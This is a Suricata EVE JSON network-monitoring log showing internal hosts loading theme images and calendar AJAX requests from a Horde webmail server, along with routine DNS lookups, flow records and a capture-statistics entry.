{"timestamp":"2020-02-29T00:19:47.985315+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436}} {"timestamp":"2020-02-29T00:19:47.985584+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674}} {"timestamp":"2020-02-29T00:19:47.985593+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558}} {"timestamp":"2020-02-29T00:19:47.985546+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221}} {"timestamp":"2020-02-29T00:19:47.985564+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423}} {"timestamp":"2020-02-29T00:19:47.985684+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546}} {"timestamp":"2020-02-29T00:19:48.131634+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings.png","state":"CLOSED","stored":false,"size":423,"tx_id":2}} {"timestamp":"2020-02-29T00:19:48.131778+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logout.png","state":"CLOSED","stored":false,"size":674,"tx_id":3}} {"timestamp":"2020-02-29T00:19:48.132056+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493}} {"timestamp":"2020-02-29T00:19:48.132118+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:19:49.677172+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7421},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":36246,"tx_id":0}} {"timestamp":"2020-02-29T00:19:49.688948+0000","flow_id":1638833592828724,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48417,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1346,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:49.800136+0000","flow_id":1638833592828724,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48417,"proto":"UDP","dns":{"type":"answer","id":1346,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:49.800136+0000","flow_id":1638833592828724,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48417,"proto":"UDP","dns":{"type":"answer","id":1346,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:49.965665+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339}} {"timestamp":"2020-02-29T00:19:50.000242+0000","flow_id":7712368340100,"event_type":"flow","src_ip":"192.168.10.122","src_port":44069,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:49.044164+0000","end":"2020-02-29T00:14:49.152103+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:50.000430+0000","flow_id":1980751639961820,"event_type":"flow","src_ip":"192.168.10.81","src_port":52774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1153,"bytes_toclient":9241,"start":"2020-02-29T00:18:43.876764+0000","end":"2020-02-29T00:18:49.567494+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:50.000900+0000","flow_id":2108866204128541,"event_type":"flow","src_ip":"192.168.10.122","src_port":51339,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:49.316701+0000","end":"2020-02-29T00:14:49.421564+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:50.230923+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:19:50.252004+0000","flow_id":559357987575908,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31396,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:50.360299+0000","flow_id":559357987575908,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54554,"proto":"UDP","dns":{"type":"answer","id":31396,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:50.360299+0000","flow_id":559357987575908,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54554,"proto":"UDP","dns":{"type":"answer","id":31396,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:50.428452+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629}} {"timestamp":"2020-02-29T00:19:50.428452+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} {"timestamp":"2020-02-29T00:19:50.482275+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1644,"tx_id":2}} {"timestamp":"2020-02-29T00:19:50.490777+0000","flow_id":1012257993948441,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39263,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52820,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:50.601928+0000","flow_id":1012257993948441,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39263,"proto":"UDP","dns":{"type":"answer","id":52820,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:50.601928+0000","flow_id":1012257993948441,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39263,"proto":"UDP","dns":{"type":"answer","id":52820,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:50.628321+0000","flow_id":545992049333857,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59343,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17689,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:50.736476+0000","flow_id":545992049333857,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59343,"proto":"UDP","dns":{"type":"answer","id":17689,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:50.736476+0000","flow_id":545992049333857,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59343,"proto":"UDP","dns":{"type":"answer","id":17689,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:50.762114+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608}} {"timestamp":"2020-02-29T00:19:50.762114+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} {"timestamp":"2020-02-29T00:19:50.766850+0000","flow_id":787291901945212,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34888,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:19:50.766850+0000","flow_id":787291901945212,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34888,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:19:51.059913+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/message.png","state":"CLOSED","stored":false,"size":493,"tx_id":3}} {"timestamp":"2020-02-29T00:19:51.060200+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262}} {"timestamp":"2020-02-29T00:19:51.201868+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-active.png","state":"CLOSED","stored":false,"size":262,"tx_id":4}} {"timestamp":"2020-02-29T00:19:51.202349+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207}} {"timestamp":"2020-02-29T00:19:51.389548+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-subnavi.png","state":"CLOSED","stored":false,"size":207,"tx_id":5}} {"timestamp":"2020-02-29T00:19:51.389808+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535}} {"timestamp":"2020-02-29T00:19:52.000478+0000","event_type":"stats","stats":{"uptime":14844,"capture":{"kernel_packets":137111,"kernel_drops":0},"decoder":{"pkts":137114,"bytes":94109551,"invalid":192,"ipv4":135575,"ipv6":10,"ethernet":137114,"raw":0,"null":0,"sll":0,"tcp":130102,"udp":5266,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2829,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2845,"synack":2836,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1866,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2410,"failed_udp":112},"tx":{"http":4776,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2492}},"flow_mgr":{"closed_pruned":2801,"new_pruned":17,"est_pruned":2464,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":3,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20176,"memcap_state":0,"memcap_global":0},"http":{"memuse":322476,"memcap":0}}} {"timestamp":"2020-02-29T00:19:52.944295+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/whitelist.png","state":"CLOSED","stored":false,"size":546,"tx_id":3}} {"timestamp":"2020-02-29T00:19:52.944595+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new.png","state":"CLOSED","stored":false,"size":436,"tx_id":6}} {"timestamp":"2020-02-29T00:19:52.944695+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52920,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/blacklist.png","state":"CLOSED","stored":false,"size":558,"tx_id":2}} {"timestamp":"2020-02-29T00:19:52.946829+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-normal.png","state":"CLOSED","stored":false,"size":221,"tx_id":6}} {"timestamp":"2020-02-29T00:19:53.000739+0000","flow_id":1936470511985381,"event_type":"flow","src_ip":"192.168.10.122","src_port":49156,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:52.729829+0000","end":"2020-02-29T00:14:52.835054+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:53.120559+0000","flow_id":231209601455855,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33684,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17640,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:53.134925+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":4}} {"timestamp":"2020-02-29T00:19:53.229605+0000","flow_id":231209601455855,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33684,"proto":"UDP","dns":{"type":"answer","id":17640,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 